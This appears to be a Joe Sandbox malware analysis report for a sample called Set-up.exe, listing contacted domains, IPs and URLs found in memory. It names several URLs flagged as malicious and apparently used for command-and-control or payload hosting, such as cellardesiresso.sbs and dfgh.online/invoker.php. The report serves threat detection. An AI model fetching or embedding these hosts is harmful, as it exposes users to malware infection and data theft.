              https://cellardesiresso.sbs/piw0%Avira URL Cloudsafe

              Domains and IPs

              Contacted Domains

              NameIPActiveMaliciousAntivirus DetectionReputation
              cegu.shop
              		185.161.251.21
              		truefalse
                		high
                cellardesiresso.sbs
                		104.21.87.8
                		truetrue
                  		unknown
                  klipvumisui.shop
                  		172.67.208.58
                  		truefalse
                    		high

                    Contacted URLs

                    NameMaliciousAntivirus DetectionReputation
                    rabidcowse.shopfalse
                      		high
                      https://cellardesiresso.sbs/apitrue
                      • Avira URL Cloud: safe
                      		unknown
                      cloudewahsj.shopfalse
                        		high
                        nearycrepso.shopfalse
                          		high
                          abruptyopsn.shopfalse
                            		high
                            https://klipvumisui.shop/int_clp_sha.txtfalse
                              		high
                              wholersorie.shopfalse
                                		high
                                noisycuttej.shopfalse
                                  		high
                                  https://cegu.shop/8574262446/ph.txtfalse
                                    		high
                                    cellardesiresso.sbstrue
                                    • Avira URL Cloud: safe
                                    		unknown
                                    framekgirus.shopfalse
                                      		high

                                      URLs from Memory and Binaries

                                      NameSourceMaliciousAntivirus DetectionReputation
                                      https://duckduckgo.com/chrome_newtabSet-up.exe, 00000000.00000003.1805825614.00000000034EF000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1805923865.00000000034D8000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        https://jrsoftware.org/ishelp/index.php?topic=setupcmdlineSetupUSet-up.exe, 00000000.00000003.1912566496.000000000391C000.00000004.00000800.00020000.00000000.sdmp, PU6S498VOPMOZVY2Y7.exe, 00000006.00000000.1974262864.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, PU6S498VOPMOZVY2Y7.exe.0.drfalse
                                          		high
                                          https://certs.securetrust.com/CA0:Set-up.exe, 00000000.00000003.1967591399.00000000034E6000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000002.1975541665.000000000060F000.00000004.00000020.00020000.00000000.sdmp, PU6S498VOPMOZVY2Y7.exe.0.drfalse
                                            		high
                                            https://duckduckgo.com/ac/?q=Set-up.exe, 00000000.00000003.1805825614.00000000034EF000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1805923865.00000000034D8000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              http://crl.usertrPU6S498VOPMOZVY2Y7.tmp, 00000007.00000003.2003746218.0000000002800000.00000004.00001000.00020000.00000000.sdmp, PU6S498VOPMOZVY2Y7.tmp, 00000009.00000003.2528654757.0000000002E70000.00000004.00001000.00020000.00000000.sdmpfalse
                                                		high
                                                http://certs.securetrust.com/issuers/VCTWGTSCA_L1.crt0Set-up.exe, 00000000.00000003.1967591399.00000000034E6000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000002.1975541665.000000000060F000.00000004.00000020.00020000.00000000.sdmp, PU6S498VOPMOZVY2Y7.exe.0.drfalse
                                                  		high
                                                  https://cellardesiresso.sbs/apiodSet-up.exe, 00000000.00000002.1976966783.0000000000672000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1865578405.0000000000671000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1967884896.0000000000671000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://crl.vikingcloud.com/TWGCA.crl0tSet-up.exe, 00000000.00000003.1967591399.00000000034E6000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000002.1975541665.000000000060F000.00000004.00000020.00020000.00000000.sdmp, PU6S498VOPMOZVY2Y7.exe.0.drfalse
                                                    		high
                                                    http://ocsp.starfieldtech.com/0DSet-up.exefalse
                                                      		high
                                                      https://certs.securetrust.com/CA05Set-up.exe, 00000000.00000003.1967591399.00000000034E6000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000002.1975541665.000000000060F000.00000004.00000020.00020000.00000000.sdmp, PU6S498VOPMOZVY2Y7.exe.0.drfalse
                                                        		high
                                                        https://aka.ms/pscore6lBpowershell.exe, 00000002.00000002.1903649032.00000000048F7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1903649032.00000000048E8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          		high
                                                          https://www.remobjects.com/psPU6S498VOPMOZVY2Y7.exe, 00000006.00000003.1987192469.000000007EF0B000.00000004.00001000.00020000.00000000.sdmp, PU6S498VOPMOZVY2Y7.exe, 00000006.00000003.1978639470.000000000366F000.00000004.00001000.00020000.00000000.sdmp, PU6S498VOPMOZVY2Y7.tmp, 00000007.00000000.1992282981.0000000000EA1000.00000020.00000001.01000000.00000009.sdmp, PU6S498VOPMOZVY2Y7.tmp, 00000009.00000000.2014920504.0000000000ADD000.00000020.00000001.01000000.0000000C.sdmp, PU6S498VOPMOZVY2Y7.tmp.6.drfalse
                                                            		high
                                                            https://www.innosetup.com/PU6S498VOPMOZVY2Y7.exe, 00000006.00000003.1987192469.000000007EF0B000.00000004.00001000.00020000.00000000.sdmp, PU6S498VOPMOZVY2Y7.exe, 00000006.00000003.1978639470.000000000366F000.00000004.00001000.00020000.00000000.sdmp, PU6S498VOPMOZVY2Y7.tmp, 00000007.00000000.1992282981.0000000000EA1000.00000020.00000001.01000000.00000009.sdmp, PU6S498VOPMOZVY2Y7.tmp, 00000009.00000000.2014920504.0000000000ADD000.00000020.00000001.01000000.0000000C.sdmp, PU6S498VOPMOZVY2Y7.tmp.6.drfalse
                                                              		high
                                                              https://cellardesiresso.sbs/apipiSet-up.exe, 00000000.00000003.1832822224.0000000000672000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              https://certs.securetrust.com/CA0Set-up.exe, 00000000.00000003.1967591399.00000000034E6000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000002.1975541665.000000000060F000.00000004.00000020.00020000.00000000.sdmp, PU6S498VOPMOZVY2Y7.exe.0.drfalse
                                                                		high
                                                                http://www.autohotkey.comCouldBrightLib.exe, 00000024.00000000.2455612462.000000000049A000.00000002.00000001.01000000.0000000E.sdmp, BrightLib.exe, 00000024.00000002.2499423474.000000000049A000.00000002.00000001.01000000.0000000E.sdmpfalse
                                                                  		high
                                                                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000002.00000002.1903649032.00000000048BF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    http://www.certum.pl/CPS0PU6S498VOPMOZVY2Y7.tmp, 00000007.00000003.1996237437.00000000037F0000.00000004.00001000.00020000.00000000.sdmp, PU6S498VOPMOZVY2Y7.tmp, 00000007.00000003.2003746218.0000000002800000.00000004.00001000.00020000.00000000.sdmp, PU6S498VOPMOZVY2Y7.tmp, 00000009.00000003.2528654757.0000000002E70000.00000004.00001000.00020000.00000000.sdmp, _isdecmp.dll.9.drfalse
                                                                      		high
                                                                      http://www.innosetup.com/Set-up.exefalse
                                                                        		high
                                                                        http://michaeluno.jp/4BrightLib.exe, 00000024.00000002.2500367955.0000000003220000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        • Avira URL Cloud: safe
                                                                        		unknown
                                                                        http://crl.certum.pl/ctnca.crl0kPU6S498VOPMOZVY2Y7.tmp, 00000007.00000003.1996237437.00000000037F0000.00000004.00001000.00020000.00000000.sdmp, PU6S498VOPMOZVY2Y7.tmp, 00000007.00000003.2003746218.0000000002800000.00000004.00001000.00020000.00000000.sdmp, PU6S498VOPMOZVY2Y7.tmp, 00000009.00000003.2528654757.0000000002E70000.00000004.00001000.00020000.00000000.sdmp, _isdecmp.dll.9.drfalse
                                                                          		high
                                                                          https://klipvumisui.shop/int_clp_sha.txts;Set-up.exe, 00000000.00000002.1975541665.00000000005F4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          • Avira URL Cloud: malware
                                                                          		unknown
                                                                          https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=Set-up.exe, 00000000.00000003.1805825614.00000000034EF000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1805923865.00000000034D8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            http://crl.rootca1.amazontrust.com/rootca1.crl0Set-up.exe, 00000000.00000003.1832991094.00000000034F5000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              https://cellardesiresso.sbs/apiDSet-up.exe, 00000000.00000003.1848702548.0000000000672000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1855564211.0000000000674000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1967884896.0000000000671000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              • Avira URL Cloud: safe
                                                                              		unknown
                                                                              http://ocsp.rootca1.amazontrust.com0:Set-up.exe, 00000000.00000003.1832991094.00000000034F5000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                http://www.autohotkey.comBrightLib.exe, 00000024.00000000.2455612462.000000000049A000.00000002.00000001.01000000.0000000E.sdmp, BrightLib.exe, 00000024.00000002.2499423474.000000000049A000.00000002.00000001.01000000.0000000E.sdmpfalse
                                                                                  		high
                                                                                  https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Set-up.exe, 00000000.00000003.1820986433.0000000003515000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1806234531.000000000351C000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1820857270.0000000003515000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1806355173.0000000003515000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1820779277.0000000003515000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    http://certificates.starfieldtech.com/repository/1604Set-up.exefalse
                                                                                      		high
                                                                                      https://www.ecosia.org/newtab/Set-up.exe, 00000000.00000003.1805825614.00000000034EF000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1805923865.00000000034D8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        		high
                                                                                        http://www.symauth.com/cps0(Set-up.exefalse
                                                                                          		high
                                                                                          https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brSet-up.exe, 00000000.00000003.1833846923.00000000035E8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            		high
                                                                                            https://cellardesiresso.sbs/apiQSet-up.exe, 00000000.00000002.1975541665.000000000060F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            • Avira URL Cloud: safe
                                                                                            		unknown
                                                                                            http://certs.securetrust.com/issuers/TWGCSCA_L1.crt0Set-up.exe, 00000000.00000003.1967591399.00000000034E6000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000002.1975541665.000000000060F000.00000004.00000020.00020000.00000000.sdmp, PU6S498VOPMOZVY2Y7.exe.0.drfalse
                                                                                              		high
                                                                                              https://cellardesiresso.sbs/buSet-up.exe, 00000000.00000002.1975541665.000000000060F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              • Avira URL Cloud: safe
                                                                                              		unknown
                                                                                              https://klipvumisui.shop/Set-up.exe, 00000000.00000002.1976966783.0000000000672000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1967884896.0000000000671000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                		high
                                                                                                https://cellardesiresso.sbs/apiaFPSet-up.exe, 00000000.00000003.1832822224.0000000000672000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                • Avira URL Cloud: safe
                                                                                                		unknown
                                                                                                https://cegu.shop/8574262446/ph.txtsSet-up.exe, 00000000.00000002.1975541665.00000000005CB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                • Avira URL Cloud: malware
                                                                                                		unknown
                                                                                                https://cellardesiresso.sbs/Set-up.exe, 00000000.00000003.1967884896.000000000066D000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000002.1976966783.000000000066D000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1865578405.000000000066D000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1820887982.00000000034D6000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000002.1975541665.000000000060F000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1832822224.0000000000672000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1820837451.00000000034CE000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1855025285.000000000065D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                • Avira URL Cloud: safe
                                                                                                		unknown
                                                                                                http://www.symauth.com/rpa00Set-up.exefalse
                                                                                                  		high
                                                                                                  https://support.microsofSet-up.exe, 00000000.00000003.1806234531.000000000351E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    		high
                                                                                                    http://crl.vikingcloud.com/VCTWGTSCA_L1.crl0Set-up.exe, 00000000.00000003.1967591399.00000000034E6000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000002.1975541665.000000000060F000.00000004.00000020.00020000.00000000.sdmp, PU6S498VOPMOZVY2Y7.exe.0.drfalse
                                                                                                      		high
                                                                                                      http://www.info-zip.org/BrightLib.exe, 00000024.00000002.2524483851.0000000039BA4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        		high
                                                                                                        https://cellardesiresso.sbs/1Set-up.exe, 00000000.00000003.1848683758.00000000034C2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        • Avira URL Cloud: safe
                                                                                                        		unknown
                                                                                                        https://klipvumisui.shop/int_clp_sha.txt8Set-up.exe, 00000000.00000002.1975541665.00000000005CB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        • Avira URL Cloud: malware
                                                                                                        		unknown
                                                                                                        http://ocsp.securetrust.com/0?Set-up.exe, 00000000.00000003.1967591399.00000000034E6000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000002.1975541665.000000000060F000.00000004.00000020.00020000.00000000.sdmp, PU6S498VOPMOZVY2Y7.exe.0.drfalse
                                                                                                          		high
                                                                                                          https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016ExamplesSet-up.exe, 00000000.00000003.1806355173.00000000034F0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            		high
                                                                                                            https://dfgh.online/invoker.php?compName=hZpowershell.exe, 00000002.00000002.1903649032.0000000004BB0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            • Avira URL Cloud: malware
                                                                                                            		unknown
                                                                                                            http://repository.certum.pl/cscasha2.cer0PU6S498VOPMOZVY2Y7.tmp, 00000007.00000003.1996237437.00000000037F0000.00000004.00001000.00020000.00000000.sdmp, PU6S498VOPMOZVY2Y7.tmp, 00000007.00000003.2003746218.0000000002800000.00000004.00001000.00020000.00000000.sdmp, PU6S498VOPMOZVY2Y7.tmp, 00000009.00000003.2528654757.0000000002E70000.00000004.00001000.00020000.00000000.sdmp, _isdecmp.dll.9.drfalse
                                                                                                              		high
                                                                                                              http://ocsp.sectigo.com0PU6S498VOPMOZVY2Y7.tmp, 00000007.00000003.1996237437.00000000037F0000.00000004.00001000.00020000.00000000.sdmp, PU6S498VOPMOZVY2Y7.tmp, 00000007.00000003.2003746218.0000000002800000.00000004.00001000.00020000.00000000.sdmp, PU6S498VOPMOZVY2Y7.tmp, 00000009.00000003.2528654757.0000000002E70000.00000004.00001000.00020000.00000000.sdmp, _isdecmp.dll.9.drfalse
                                                                                                                		high
                                                                                                                http://ocsp.vikingcloud.com/0ASet-up.exe, 00000000.00000003.1967591399.00000000034E6000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000002.1975541665.000000000060F000.00000004.00000020.00020000.00000000.sdmp, PU6S498VOPMOZVY2Y7.exe.0.drfalse
                                                                                                                  		high
                                                                                                                  http://certs.securetrust.com/issuers/TWGCA.crt0Set-up.exe, 00000000.00000003.1967591399.00000000034E6000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000002.1975541665.000000000060F000.00000004.00000020.00020000.00000000.sdmp, PU6S498VOPMOZVY2Y7.exe.0.drfalse
                                                                                                                    		high
                                                                                                                    http://ocsp.vikingcloud.com/0:Set-up.exe, 00000000.00000003.1967591399.00000000034E6000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000002.1975541665.000000000060F000.00000004.00000020.00020000.00000000.sdmp, PU6S498VOPMOZVY2Y7.exe.0.drfalse
                                                                                                                      		high
                                                                                                                      http://michaeluno.jp/hBrightLib.exe, 00000024.00000002.2500321034.0000000003218000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                      • Avira URL Cloud: safe
                                                                                                                      		unknown
                                                                                                                      https://dfgh.online/invoker.php?compName=powershell.exe, 00000002.00000002.1902724955.00000000006FB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                        		high
                                                                                                                        https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=Set-up.exe, 00000000.00000003.1805825614.00000000034EF000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1805923865.00000000034D8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                          		high
                                                                                                                          https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Set-up.exe, 00000000.00000003.1820986433.0000000003515000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1806234531.000000000351C000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1820857270.0000000003515000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1806355173.0000000003515000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1820779277.0000000003515000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                            		high
                                                                                                                            https://cellardesiresso.sbs:443/apiSet-up.exe, Set-up.exe, 00000000.00000003.1848702548.0000000000672000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1855564211.0000000000674000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                            • Avira URL Cloud: safe
                                                                                                                            		unknown
                                                                                                                            http://crl.thawte.com/ThawteTimestampingCA.crl0Set-up.exefalse
                                                                                                                              		high
                                                                                                                              http://x1.c.lencr.org/0Set-up.exe, 00000000.00000003.1832991094.00000000034F5000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                		high
                                                                                                                                http://x1.i.lencr.org/0Set-up.exe, 00000000.00000003.1832991094.00000000034F5000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                  		high
                                                                                                                                  http://crt.sectigo.com/SectigPU6S498VOPMOZVY2Y7.tmp, 00000007.00000003.2003746218.0000000002800000.00000004.00001000.00020000.00000000.sdmp, PU6S498VOPMOZVY2Y7.tmp, 00000009.00000003.2528654757.0000000002E70000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                    		high
                                                                                                                                    https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17InstallSet-up.exe, 00000000.00000003.1806355173.00000000034F0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                      		high
                                                                                                                                      https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchSet-up.exe, 00000000.00000003.1805825614.00000000034EF000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1805923865.00000000034D8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                        		high
                                                                                                                                        http://subca.ocsp-certum.com01PU6S498VOPMOZVY2Y7.tmp, 00000007.00000003.1996237437.00000000037F0000.00000004.00001000.00020000.00000000.sdmp, PU6S498VOPMOZVY2Y7.tmp, 00000007.00000003.2003746218.0000000002800000.00000004.00001000.00020000.00000000.sdmp, PU6S498VOPMOZVY2Y7.tmp, 00000009.00000003.2528654757.0000000002E70000.00000004.00001000.00020000.00000000.sdmp, _isdecmp.dll.9.drfalse
                                                                                                                                          		high
                                                                                                                                          https://sectigo.com/CPS0DPU6S498VOPMOZVY2Y7.tmp, 00000007.00000003.1996237437.00000000037F0000.00000004.00001000.00020000.00000000.sdmp, PU6S498VOPMOZVY2Y7.tmp, 00000007.00000003.2003746218.0000000002800000.00000004.00001000.00020000.00000000.sdmp, PU6S498VOPMOZVY2Y7.tmp, 00000009.00000003.2528654757.0000000002E70000.00000004.00001000.00020000.00000000.sdmp, _isdecmp.dll.9.drfalse
                                                                                                                                            		high
                                                                                                                                            https://jrsoftware.org0PU6S498VOPMOZVY2Y7.tmp, 00000007.00000003.1996237437.00000000037F0000.00000004.00001000.00020000.00000000.sdmp, PU6S498VOPMOZVY2Y7.tmp, 00000007.00000003.2003746218.0000000002800000.00000004.00001000.00020000.00000000.sdmp, PU6S498VOPMOZVY2Y7.tmp, 00000009.00000003.2528654757.0000000002E70000.00000004.00001000.00020000.00000000.sdmp, _isdecmp.dll.9.drfalse
                                                                                                                                              		high
                                                                                                                                              https://jrsoftware.org/PU6S498VOPMOZVY2Y7.tmp, 00000007.00000003.1996237437.00000000037F0000.00000004.00001000.00020000.00000000.sdmp, PU6S498VOPMOZVY2Y7.tmp, 00000007.00000003.2003746218.0000000002800000.00000004.00001000.00020000.00000000.sdmp, PU6S498VOPMOZVY2Y7.tmp, 00000009.00000003.2528654757.0000000002E70000.00000004.00001000.00020000.00000000.sdmp, _isdecmp.dll.9.drfalse
                                                                                                                                                		high
                                                                                                                                                http://crl.starfieldtech.com/repository/sfsroot.crl0PSet-up.exefalse
                                                                                                                                                  		high
                                                                                                                                                  https://support.mozilla.org/products/firefoxgro.allSet-up.exe, 00000000.00000003.1833846923.00000000035E8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                    		high
                                                                                                                                                    http://crl.trustwave.com/TWGCA.crl0nSet-up.exe, 00000000.00000003.1967591399.00000000034E6000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000002.1975541665.000000000060F000.00000004.00000020.00020000.00000000.sdmp, PU6S498VOPMOZVY2Y7.exe.0.drfalse
                                                                                                                                                      		high
                                                                                                                                                      https://sectigo.com/CPS0PU6S498VOPMOZVY2Y7.tmp, 00000007.00000003.2003746218.0000000002800000.00000004.00001000.00020000.00000000.sdmp, PU6S498VOPMOZVY2Y7.tmp, 00000009.00000003.2528654757.0000000002E70000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                        		high
                                                                                                                                                        http://repository.certum.pl/ctnca.cer09PU6S498VOPMOZVY2Y7.tmp, 00000007.00000003.1996237437.00000000037F0000.00000004.00001000.00020000.00000000.sdmp, PU6S498VOPMOZVY2Y7.tmp, 00000007.00000003.2003746218.0000000002800000.00000004.00001000.00020000.00000000.sdmp, PU6S498VOPMOZVY2Y7.tmp, 00000009.00000003.2528654757.0000000002E70000.00000004.00001000.00020000.00000000.sdmp, _isdecmp.dll.9.drfalse
                                                                                                                                                          		high
                                                                                                                                                          https://www.google.com/images/branding/product/ico/googleg_lodp.icoSet-up.exe, 00000000.00000003.1805825614.00000000034EF000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1805923865.00000000034D8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                            		high
                                                                                                                                                            http://crl.securetrust.com/TWGCSCA_L1.crl0ySet-up.exe, 00000000.00000003.1967591399.00000000034E6000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000002.1975541665.000000000060F000.00000004.00000020.00020000.00000000.sdmp, PU6S498VOPMOZVY2Y7.exe.0.drfalse
                                                                                                                                                              		high
                                                                                                                                                              http://ocsp.thawte.com0Set-up.exefalse
                                                                                                                                                                		high
                                                                                                                                                                https://www.certum.pl/CPS0PU6S498VOPMOZVY2Y7.tmp, 00000007.00000003.1996237437.00000000037F0000.00000004.00001000.00020000.00000000.sdmp, PU6S498VOPMOZVY2Y7.tmp, 00000007.00000003.2003746218.0000000002800000.00000004.00001000.00020000.00000000.sdmp, PU6S498VOPMOZVY2Y7.tmp, 00000009.00000003.2528654757.0000000002E70000.00000004.00001000.00020000.00000000.sdmp, _isdecmp.dll.9.drfalse
                                                                                                                                                                  		high
                                                                                                                                                                  http://crl.certum.pl/cscasha2.crl0qPU6S498VOPMOZVY2Y7.tmp, 00000009.00000003.2528654757.0000000002E70000.00000004.00001000.00020000.00000000.sdmp, _isdecmp.dll.9.drfalse
                                                                                                                                                                    		high
                                                                                                                                                                    http://cscasha2.ocsp-certum.com04PU6S498VOPMOZVY2Y7.tmp, 00000007.00000003.1996237437.00000000037F0000.00000004.00001000.00020000.00000000.sdmp, PU6S498VOPMOZVY2Y7.tmp, 00000007.00000003.2003746218.0000000002800000.00000004.00001000.00020000.00000000.sdmp, PU6S498VOPMOZVY2Y7.tmp, 00000009.00000003.2528654757.0000000002E70000.00000004.00001000.00020000.00000000.sdmp, _isdecmp.dll.9.drfalse
                                                                                                                                                                      		high
                                                                                                                                                                      https://cellardesiresso.sbs/piwSet-up.exe, 00000000.00000003.1967884896.000000000066D000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1855025285.000000000065D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                                                      		unknown
                                                                                                                                                                      https://ac.ecosia.org/autocomplete?q=Set-up.exe, 00000000.00000003.1805825614.00000000034EF000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1805923865.00000000034D8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                        		high
                                                                                                                                                                        http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0tPU6S498VOPMOZVY2Y7.tmp, 00000007.00000003.1996237437.00000000037F0000.00000004.00001000.00020000.00000000.sdmp, PU6S498VOPMOZVY2Y7.tmp, 00000007.00000003.2003746218.0000000002800000.00000004.00001000.00020000.00000000.sdmp, PU6S498VOPMOZVY2Y7.tmp, 00000009.00000003.2528654757.0000000002E70000.00000004.00001000.00020000.00000000.sdmp, _isdecmp.dll.9.drfalse
                                                                                                                                                                          		high
                                                                                                                                                                          http://crl.starfieldtech.com/repository/0Set-up.exefalse
                                                                                                                                                                            		high
                                                                                                                                                                            http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#PU6S498VOPMOZVY2Y7.tmp, 00000007.00000003.1996237437.00000000037F0000.00000004.00001000.00020000.00000000.sdmp, PU6S498VOPMOZVY2Y7.tmp, 00000007.00000003.2003746218.0000000002800000.00000004.00001000.00020000.00000000.sdmp, PU6S498VOPMOZVY2Y7.tmp, 00000009.00000003.2528654757.0000000002E70000.00000004.00001000.00020000.00000000.sdmp, _isdecmp.dll.9.drfalse
                                                                                                                                                                              		high
                                                                                                                                                                              http://crt.rootca1.amazontrust.com/rootca1.cer0?Set-up.exe, 00000000.00000003.1832991094.00000000034F5000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                		high
                                                                                                                                                                                https://cellardesiresso.sbs/apiaySet-up.exe, 00000000.00000003.1967884896.0000000000671000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                                                                		unknown
                                                                                                                                                                                http://michaeluno.jp/BrightLib.exe, 00000024.00000002.2500367955.0000000003220000.00000004.00000020.00020000.00000000.sdmp, BrightLib.exe, 00000024.00000000.2455660146.0000000000AEE000.00000002.00000001.01000000.0000000E.sdmp, BrightLib.exe, 00000024.00000002.2500943004.00000000062A2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                  		high
                                                                                                                                                                                  http://www.remobjects.com/psSet-up.exefalse
                                                                                                                                                                                    		high
                                                                                                                                                                                    https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=Set-up.exe, 00000000.00000003.1805825614.00000000034EF000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1805923865.00000000034D8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                      		high

                                                                                                                                                                                      World Map of Contacted IPs

                                                                                                                                                                                      • No. of IPs < 25%
                                                                                                                                                                                      • 25% < No. of IPs < 50%
                                                                                                                                                                                      • 50% < No. of IPs < 75%
                                                                                                                                                                                      • 75% < No. of IPs

                                                                                                                                                                                      Public IPs

                                                                                                                                                                                      IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                      104.21.87.8
                                                                                                                                                                                      		cellardesiresso.sbsUnited States
                                                                                                                                                                                      		13335CLOUDFLARENETUStrue
                                                                                                                                                                                      185.161.251.21
                                                                                                                                                                                      		cegu.shopUnited Kingdom
                                                                                                                                                                                      		5089NTLGBfalse
                                                                                                                                                                                      172.67.208.58
                                                                                                                                                                                      		klipvumisui.shopUnited States
                                                                                                                                                                                      		13335CLOUDFLARENETUSfalse

                                                                                                                                                                                      General Information

                                                                                                                                                                                      Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                                                      Analysis ID:1584522
                                                                                                                                                                                      Start date and time:2025-01-05 18:52:13 +01:00
                                                                                                                                                                                      Joe Sandbox product:CloudBasic
                                                                                                                                                                                      Overall analysis duration:0h 9m 4s
                                                                                                                                                                                      Hypervisor based Inspection enabled:false
                                                                                                                                                                                      Report type:full
                                                                                                                                                                                      Cookbook file name:default.jbs
